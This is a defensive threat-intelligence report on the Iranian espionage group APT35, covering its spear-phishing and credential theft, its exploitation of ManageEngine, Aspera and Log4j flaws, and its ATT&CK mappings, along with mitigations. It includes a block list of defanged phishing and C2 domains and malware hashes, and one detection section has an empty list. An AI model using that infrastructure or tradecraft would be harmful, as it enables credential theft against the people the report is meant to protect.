Short title: Iran-aligned social engineering and credential theft specialist with expanding intrusion tooling
APT35, Charming Kitten, Mint Sandstorm, PHOSPHORUS, TA453, IRGC, spear-phishing, credential harvesting, civil society targeting, DIB, universities, Exchange/ManageEngine exploitation
1. Executive Summary
APT35 is a long-running Iran-aligned cyber espionage actor best known for high-touch social engineering, credential harvesting, and targeted spear-phishing against individuals and organisations aligned to Iranian strategic intelligence requirements. Microsoft tracks overlapping activity as Mint Sandstorm (PHOSPHORUS) and assesses links to Iran’s Islamic Revolutionary Guard Corps (IRGC), citing corroboration from multiple security vendors and US government action. (Microsoft)
While many APT35 operations are “low malware” and identity-centric, reporting since 2023–2024 highlights more mature tradecraft in subsets of the ecosystem, including faster adoption of public PoCs for perimeter vulnerabilities and bespoke implants/backdoors in selected intrusions. (Microsoft)
Victimology consistently includes civil society, academia, journalists, policy and Middle East analysts, as well as government and defence-adjacent targets in the UK, US, Israel, and Europe. (Microsoft)
2. Contextual Background
2.1 Nature of the threat
APT35 is commonly described as an intelligence collection actor, with recurring emphasis on:
- Spear-phishing and credential harvesting (often via spoofed login pages and rapport-building) (NCSC)
- Targeted social engineering against personal webmail to bypass enterprise controls (NCSC)
- Opportunistic and targeted exploitation of internet-facing applications, including rapid weaponisation of N-day vulnerabilities by mature subgroups Microsoft attributes to Mint Sandstorm (Microsoft)
Where relevant to APT35-linked intrusions, publicly reported vulnerabilities include:
- CVE-2022-47966 (Zoho ManageEngine, multiple on-prem products)
- Vendor advisory: ManageEngine advisory for CVE-2022-47966 (manageengine.com)
- NVD (nvd.nist.gov)
- CISA notes exploitation of CVE-2022-47966 by multiple nation-state actors as an initial access vector. (cisa.gov)
- CVE-2022-47986 (IBM Aspera Faspex)
- Vendor bulletin: IBM Security Bulletin including CVE-2022-47986 (IBM)
- NVD (nvd.nist.gov)
- Microsoft reports Mint Sandstorm exploitation of CVE-2022-47986 within days of PoC publication. (Microsoft)
- CVE-2021-44228 (Log4Shell)
- Government guidance (UK): NCSC alert on Log4j / CVE-2021-44228 (NCSC)
- NVD (nvd.nist.gov)
- Microsoft reports continued use of older vulnerabilities including Log4Shell by the Mint Sandstorm subgroup. (Microsoft)
2.2 Threat-actor attribution
- Aliases / tracking: APT35 is widely associated with “Charming Kitten”, “PHOSPHORUS/Mint Sandstorm” (Microsoft), and “TA453” (Proofpoint). MITRE ATT&CK lists G0059 with associated names including TA453, Phosphorus, Newscaster, APT35, and Mint Sandstorm. (attack.mitre.org)
- Attribution to IRGC: Microsoft assesses Mint Sandstorm is associated with an intelligence arm of the IRGC and cites corroboration plus US Treasury action. (Microsoft)
- Confidence: Likely (A2/B2): Multiple credible sources converge on Iran state alignment and IRGC association, but public reporting often describes overlaps between intrusion sets and subgroups rather than a single monolithic unit. (Microsoft)
2.3 Sector and geographic targeting
Commonly observed target sets include:
- Civil society and individuals: dissidents, activists, journalists, academics, policy researchers (including UK-linked targeting) (Microsoft)
- Government and defence-adjacent: defence industrial base, think tanks, government agencies (Microsoft)
- Critical infrastructure interest (subset): Microsoft describes targeting of US critical infrastructure (seaports, energy, transit) by a mature Mint Sandstorm subgroup. (Microsoft)
3. Technical Analysis
3.1 TTPs and tradecraft (with MITRE ATT&CK mapping)
Reconnaissance and rapport-building
- Open-source research on targets and interests: T1593 / T1589 (NCSC)
- Use of fraudulent personas and social accounts: T1585.001 (NCSC)
- Preference for personal webmail to evade enterprise controls: (behavioural pattern described in UK NCSC advisory) (NCSC)
Initial access
- Spear-phishing links and malicious file-sharing lures: T1566.002 (NCSC)
- Credential harvesting via spoofed login pages and domain lookalikes: T1566.002 + T1583.001 (NCSC)
- Exploitation of public-facing applications (subset): T1190 (Microsoft)
Post-compromise
- Use of stolen credentials for mailbox access: T1078 (NCSC)
- Email theft and persistence via forwarding rules: T1114.002 / T1114.003 (NCSC)
- PowerShell-heavy discovery and automation in intrusions attributed to a mature Mint Sandstorm subgroup: T1059.001 (Microsoft)
- Lateral movement with Impacket tooling (reported by Microsoft): T1021.002 (SMB/Windows Admin Shares) and related remote execution patterns (mapping inferred from Microsoft’s explicit Impacket mention; technique choice reflects common Impacket use cases) (Microsoft)
- Scheduled tasks for persistence (reported by Microsoft in one attack chain): T1053.005 (Microsoft)
- AD database theft objective noted by Microsoft (credential access): T1003.003 (Microsoft)
Malware/tooling (selected public reporting)
- Proofpoint reports TA453 malware frameworks including BlackSmith delivering a PowerShell trojan AnvilEcho, and describes staging via ZIP/LNK delivery and DLL components. (Proofpoint)
- Microsoft reports a custom backdoor named MediaPl in a 2023–2024 Mint Sandstorm campaign targeting universities and research organisations. (Microsoft)
3.2 Exploitation status and PoC considerations
- Actively used social engineering is ongoing: UK NCSC describes continuing spear-phishing activity through 2022 and highlights continued success of TA453-style tradecraft. (NCSC)
- N-day exploitation acceleration: Microsoft reports faster adoption of public PoCs beginning in early 2023 for a mature subgroup, including same-day use of CVE-2022-47966 PoC and rapid use of CVE-2022-47986. (Microsoft)
- Broader ecosystem exploitation signals: CISA documents that CVE-2022-47966 exploitation has been used by multiple nation-state actors for initial access, underscoring the likelihood of opportunistic overlap and copycat activity around widely weaponised CVEs. (cisa.gov)
4. Impact Assessment
4.1 Severity and scope
APT35’s impact is often driven less by single “big” malware events and more by:
- Account compromise (personal and corporate), enabling long-dwell espionage, contact harvesting, and follow-on phishing. (NCSC)
- Sensitive information theft from mailboxes and collaboration platforms, including policy, research, diplomatic, and activist data. (NCSC)
- Escalation pathways where intrusion subgroups pivot from perimeter exploits to lateral movement and directory credential access. (Microsoft)
Where APT35-linked subsets exploit critical vulnerabilities, potential impact aligns with the underlying CVSS:
- CVE-2022-47966: see NVD (nvd.nist.gov)
- CVE-2022-47986: see NVD (nvd.nist.gov)
- CVE-2021-44228: see NVD (nvd.nist.gov)
4.2 Victim profile
Observed victim profiles include:
- Individuals: journalists, activists, academics, researchers, and prominent community figures (Proofpoint examples include medical researchers and a religious figure). (Proofpoint)
- Organisations: universities/research orgs across Belgium, France, UK, US and Israel (Microsoft), plus DIB/think tanks/government services (Microsoft profile). (Microsoft)
5. Indicators of Compromise (IOCs)
5.1 IOC table (publicly reported)
Note: These IOCs are taken directly from publicly published vendor reporting and are not exhaustive. Validate context before blocking in production.
| Type | Value | Context/Notes | Source |
|---|---|---|---|
| Domain | 1drv[.]casa | Credential harvesting domain used in “BadBlood” campaign | Proofpoint: “BadBlood” campaign write-up (Proofpoint) |
| Domain | 1drv[.]online / 1drv[.]live / 1drv[.]icu / 1drv[.]surf / 1drv[.]xyz / 1drv[.]cyou | Additional reported TA453 phishing domains | Proofpoint: “BadBlood” IOC table (Proofpoint) |
| URL | 1drv[.]casa/s/AFGHJKFJelMtfZXSXSGkdsjh1 | Example credential harvesting URL (variants likely) | Proofpoint: “BadBlood” IOC table (Proofpoint) |
| Domain | understandingthewar[.]org | Lure domain used in 2024 podcast-themed operation | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| Domain | d75[.]site | Storage/stager domain used to download components | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| Domain | deepspaceocean[.]info | Reported C2 | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 5dca88f08b586a51677ff6d900234a1568f4474bbbfef258d59d73ca4532dcaf | .LNK file | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 5aee738121093866404827e1db43c8e1a7882291afedfe90314ec90b198afb36 | Podcast Plan 2024.zip | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| SHA-256 | 8a47fd166059e7e3c0c1740ea8997205f9e12fc87b1ffe064d0ed4b0bf7c2ce1 | qemus (AnvilEcho) | Proofpoint: “Best Laid Plans” IOC list (Proofpoint) |
| File path | C:\Users\Public\Public Library | Directory created during BlackSmith installation chain | Proofpoint: infection chain details (Proofpoint) |
5.2 Detection guidance
Network and DNS
- Alert on DNS/TLS SNI hits for the domains in the IOC table (with careful false-positive handling, as some patterns mimic legitimate brands). Proofpoint references Emerging Threats signature IDs for TA453 domain detections in its 2024 reporting. (Proofpoint)
Email security
- Prioritise detections for:
Endpoint and identity
- Hunt for suspicious LNK → PowerShell execution chains: T1059.001 (Proofpoint)
- Monitor mailbox rule creation (forwarding rules) and anomalous logins: T1114.003 / T1078 (NCSC)
6. Incident Response Guidance
6.1 Containment, eradication, recovery
- Contain identity first: force password resets, revoke refresh tokens, and review MFA enrolments for targeted users (APT35 tradecraft heavily favours credential theft). (NCSC)
- Mailbox triage: identify and remove malicious forwarding rules and delegates; review recent OAuth consents and “impossible travel” sign-in patterns. (NCSC)
- Scope lateral movement (where intrusion tradecraft is observed): isolate affected hosts, collect volatile artefacts, and review remote execution traces and scheduled task creation. (Microsoft)
- Block known infrastructure (domains/hashes) from vetted IOC lists and re-scan for related artefacts.
6.2 Forensic artefacts to preserve
- Email headers and full message bodies for suspected rapport-building and link delivery. (NCSC)
- Authentication logs (IdP, O365/Google Workspace), mailbox audit logs, forwarding rule changes. (NCSC)
- Endpoint artefacts: LNK files, ZIP staging, PowerShell operational logs, scheduled tasks, and any DLL drops matching published hashes. (Proofpoint)
6.3 Lessons learned
- Reduce reliance on user judgement: improve phishing-resistant MFA and implement stronger identity governance for high-risk individuals and executives.
7. Threat Intelligence Contextualisation
7.1 Similar incident patterns
APT35’s approach strongly resembles other “human-targeted” espionage clusters where patient social engineering is the primary access vector, with selective malware use when credential access alone is insufficient (as reflected in UK NCSC spear-phishing reporting and Proofpoint’s TA453 campaigns). (NCSC)
7.2 ATT&CK mapping table (observed)
| Tactic | Technique ID | Technique Name | Observed behaviour |
|---|---|---|---|
| Reconnaissance | T1593 | Search Open Websites/Domains | OSINT research on targets and hooks (NCSC) |
| Reconnaissance | T1589 | Gather Victim Identity Information | Profiling victims via open sources (NCSC) |
| Resource Development | T1585.001 | Establish Accounts: Social Media Accounts | Fake personas for engagement (NCSC) |
| Resource Development | T1583.001 | Acquire Infrastructure: Domains | Lookalike domains and phishing infra (NCSC) |
| Initial Access | T1566.002 | Phishing: Spearphishing Link | Link delivery after rapport-building (NCSC) |
| Initial Access | T1190 | Exploit Public-Facing Application | N-day exploitation by mature subgroup (Microsoft) |
| Initial Access | T1078 | Valid Accounts | Use of stolen credentials for access (NCSC) |
| Collection | T1114.002 | Remote Email Collection | Inbox access and theft (NCSC) |
| Collection/Persistence | T1114.003 | Email Forwarding Rule | Forwarding rules for ongoing visibility (NCSC) |
| Execution | T1059.001 | PowerShell | PowerShell-heavy chains and tooling (Microsoft) |
| Persistence | T1053.005 | Scheduled Task | Scheduled tasks in Microsoft-described chain (Microsoft) |
| Credential Access | T1003.003 | OS Credential Dumping: NTDS | AD database theft objective described by Microsoft (Microsoft) |
8. Mitigation Recommendations
8.1 Hardening and best practices
- Enforce phishing-resistant MFA (FIDO2/WebAuthn) for high-risk users; reduce reliance on SMS/OTP where feasible.
- Implement conditional access rules (device compliance, geo-velocity, risky sign-in blocks) and monitor for MFA fatigue patterns.
- Disable or tightly control auto-forwarding to external domains and alert on forwarding rule creation. (NCSC)
- Improve executive protection: pre-emptive training focused on rapport-building approaches and “conference invite / podcast / journalist” lures described in public reporting. (NCSC)
8.2 Patch management advice (risk-driven)
Prioritise internet-facing assets and CVEs with public PoCs, consistent with Microsoft’s reporting on rapid PoC adoption: (Microsoft)
- Patch Zoho ManageEngine per ManageEngine advisory for CVE-2022-47966 and track NVD. (manageengine.com)
- Patch IBM Aspera Faspex per IBM bulletin including CVE-2022-47986 and NVD. (IBM)
- Ensure Log4j exposure is eliminated per NCSC Log4j guidance and NVD. (NCSC)
9. Historical Context & Related Vulnerabilities
- UK NCSC situates TA453 activity within broader persistent spear-phishing campaigns, highlighting long-running success rather than one-off exploitation events. (NCSC)
- Microsoft describes evolution in at least one Mint Sandstorm subgroup from slower adoption of exploits to rapid PoC weaponisation and more complex post-exploitation playbooks. (Microsoft)
10. Future Outlook
APT35-aligned activity is likely to continue trending toward:
- More convincing, higher-trust social engineering (multi-step engagement, use of legitimate platforms, and spoofed organisations) as documented in 2024 Proofpoint reporting. (Proofpoint)
- Faster “blast radius” from newly disclosed edge CVEs where PoCs are published, consistent with Microsoft’s 2023 observations. (Microsoft)
- Selective malware deployment (PowerShell-first and modular toolsets) against hardened targets where credentials alone do not meet operational objectives. (Proofpoint)
11. Further Reading
Government and national CERT guidance
- UK NCSC advisory on SEABORGIUM and TA453 spear-phishing (NCSC)
- US Treasury sanctions statement referencing “APT 35 / Charming Kitten / Phosphorus” (U.S. Department of the Treasury)
Vendor and CTI reporting
- Microsoft: Mint Sandstorm actor overview (Microsoft)
- Microsoft: Mint Sandstorm tradecraft and rapid PoC adoption (Apr 2023) (Microsoft)
- Microsoft: 2023–2024 university/research targeting and MediaPl backdoor (Microsoft)
- Proofpoint: “BadBlood” TA453 credential phishing campaign (Proofpoint)
- Proofpoint: “Best Laid Plans” TA453 BlackSmith/AnvilEcho operation + IOCs (Proofpoint)
- MITRE ATT&CK: Group G0059 (TA453 / APT35 / Mint Sandstorm) (attack.mitre.org)